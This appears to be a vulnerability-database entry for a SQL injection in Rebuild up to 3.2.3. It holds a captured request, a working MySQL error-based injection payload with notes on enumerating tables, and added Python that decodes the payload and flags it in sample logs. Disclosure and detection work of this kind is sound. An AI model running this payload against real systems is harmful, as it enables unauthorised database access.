| Field | Value |
|---|---|
| Title | SQL injection vulnerability in the /project/tasks/list interface of the Rebuild system |
| Source | ⚠️ https://github.com/getrebuild/rebuild/issues/597 |
| User | Mechoy (UID 41579) |
| Submitted | 2023-03-19 18:24 (3 years ago) |
| Moderated | 2023-03-23 19:42 (4 days later) |
| Status | Accepted |
| VulDB entry | 223742 [Rebuild up to 3.2.3 /project/tasks/list SQL injection] |
| Points | 20 |

Description (as submitted):

Suggested description:

A SQL injection vulnerability exists in Rebuild <= 3.2.3. The /project/tasks/list interface does not properly validate its parameters, so attacker-supplied input reaches a SQL query and allows SQL injection.

Vulnerability Type: SQLi
Vendor of Product: https://github.com/getrebuild/rebuild
Affected Product Code Base: <= 3.2.3
Affected Component: /project/tasks/list
Attack Type: Remote

Request message:

```http
POST /project/tasks/list?plan=051-0186e077f3840002&sort=&search=1&pageNo=1&pageSize=40&project=050-0186e077f3840001 HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 0
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/project/050-0186e077f3840001/tasks
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679235290.8.1.1679235510.0.0.0
Connection: close
```

Note that the captured request carries a JSESSIONID session cookie, so the proof of concept was exercised from an existing browser session; the submission does not state whether the endpoint is reachable without authentication, nor which query parameter carries the payload.

Payload (URL-encoded, as submitted):

```
%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+
```

Decoded, the payload reads `%\' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x72656275696c64 limit 0,1),0x7e),1)-- `. The hex literal `0x72656275696c64` is the string `rebuild`, so this is a classic MySQL error-based injection: `updatexml()` is handed an XPath expression built from the first table name in the `rebuild` schema, MySQL rejects it and echoes the name back in the error message between the `~` (`0x7e`) markers, and the trailing `-- ` comment discards the rest of the original query. Changing the `limit 0,1` offset enumerates further table names one per request.
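The following is an added example, not code from VulDB, the reporter, or the Rebuild project. It decodes the payload above exactly as MySQL would read it (expanding the hex literals) and then runs a simple detection check over constructed access-log lines for requests to /project/tasks/list. The log lines are made up, and the example assumes the payload is placed in the `search` parameter of the request shown; the submission itself does not say which parameter carries it.

```python
"""Added example for this entry (not from VulDB, the reporter, or Rebuild):
decode the reported payload and flag MySQL error-based SQL injection
attempts against /project/tasks/list in constructed access-log lines."""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# The payload from the report, URL-encoded exactly as submitted.
REPORTED_PAYLOAD = (
    "%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+"
    "information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+"
)

_HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def expand_hex(text: str) -> str:
    """Rewrite MySQL hex string literals (0x72656275696c64 -> 'rebuild') as
    quoted text so an injected query can be read the way the server sees it."""
    def expand(match: re.Match) -> str:
        digits = match.group(1)
        if len(digits) % 2:            # odd length: not a byte string, leave it
            return match.group(0)
        decoded = bytes.fromhex(digits).decode("latin-1")
        return repr(decoded) if decoded.isprintable() else match.group(0)
    return _HEX_LITERAL.sub(expand, text)


def decode_payload(encoded: str) -> str:
    """URL-decode a query-string value ('+' is a space) and expand hex literals."""
    return expand_hex(unquote_plus(encoded))


# Indicators of the technique used in the report: XML functions that leak data
# through MySQL error messages, schema enumeration, a quote break-out followed
# by a boolean operator, and a trailing comment that truncates the query.
INDICATORS = {
    "xml_error_function": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "quote_breakout": re.compile(r"(\\'|')\s*(or|and)\b", re.I),
    "trailing_comment": re.compile(r"--\s*$|#\s*$"),
}

_REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_target(target: str) -> dict[str, list[str]]:
    """Decode every query-string value of a request target and return
    {parameter: [matched indicator names]} for values that look injected."""
    findings: dict[str, list[str]] = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        readable = expand_hex(value)   # parse_qsl already percent-decoded it
        hits = [label for label, rx in INDICATORS.items() if rx.search(readable)]
        if hits:
            findings[name] = hits
    return findings


def scan_log(lines: list[str]) -> list[tuple[str, dict[str, list[str]]]]:
    """Apply scan_target to Combined Log Format lines aimed at the endpoint."""
    results = []
    for line in lines:
        m = _REQUEST_LINE.search(line)
        if not m or not urlsplit(m["target"]).path.endswith("/project/tasks/list"):
            continue
        found = scan_target(m["target"])
        if found:
            results.append((m["target"], found))
    return results


# Constructed log lines for the demonstration (not real traffic); the payload
# is assumed to sit in the `search` parameter of the reported request.
SAMPLE_LOG = [
    '192.168.0.50 - - [19/Mar/2023:18:24:01 +0800] "GET /project/050-0186e077f3840001/tasks HTTP/1.1" 200 5120',
    '192.168.0.50 - - [19/Mar/2023:18:24:02 +0800] "POST /project/tasks/list?plan=051-0186e077f3840002&sort=&search=report&pageNo=1&pageSize=40&project=050-0186e077f3840001 HTTP/1.1" 200 812',
    '192.168.0.50 - - [19/Mar/2023:18:24:03 +0800] "POST /project/tasks/list?plan=051-0186e077f3840002&sort=&search='
    + REPORTED_PAYLOAD + '&pageNo=1&pageSize=40&project=050-0186e077f3840001 HTTP/1.1" 200 431',
]

if __name__ == "__main__":
    print(decode_payload(REPORTED_PAYLOAD))
    for target, found in scan_log(SAMPLE_LOG):
        print(target.split("?", 1)[0], found)
```

The indicators are deliberately narrow (they describe this report's technique, not SQL injection in general); a production rule would also decode repeatedly to catch double-encoded input and would alert on the database error text in application logs, which the `updatexml()` trick depends on.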